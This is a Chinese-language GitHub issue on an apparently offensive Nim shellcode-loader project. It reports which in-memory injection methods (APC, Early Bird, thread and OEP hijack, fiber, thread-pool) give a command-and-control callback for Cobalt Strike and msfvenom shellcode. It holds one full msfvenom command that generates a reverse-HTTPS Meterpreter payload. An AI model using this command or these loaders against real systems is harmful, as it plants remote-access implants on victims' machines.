Skip to content

程序加载方法兼容性综合测试 #6

@spooky18

Description

@spooky18

测试环境在win 10 64位,Nim、MingW编译环境均为64位。其中很多方法不上线,不知道是我的测试方法不对还是?

Cobalt Strike 生成的64位 shellcode , 格式raw的bin文件

Thread_Pool_Wait 报错

image

Thread_Hiijack_Inject_Load 不上线

OEP_Hiijack_Inject_Load 不上线

APC_Ijnect_Load 不上线

Direct_Load 上线

Early_Bird_APC_Injetc_Load 上线

Fiber_Load 报错

image

msfvenom生成的64位 Shellcode、命令“
msfvenom -p windows/x64/meterpreter/reverse_https -f raw LPORT=443 -o test_x64.bin LHOST=xx.xx.xx.xx

APC_Ijnect_Load 不上线

Early_Bird_APC_Injetc_Load 不上线

Fiber_Load 不上线

Direct_Load 不上线

OEP_Hiijack_Inject_Load 不上线

Thread_Hiijack_Inject_Load 不上线

Thread_Pool_Wait 不上线

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions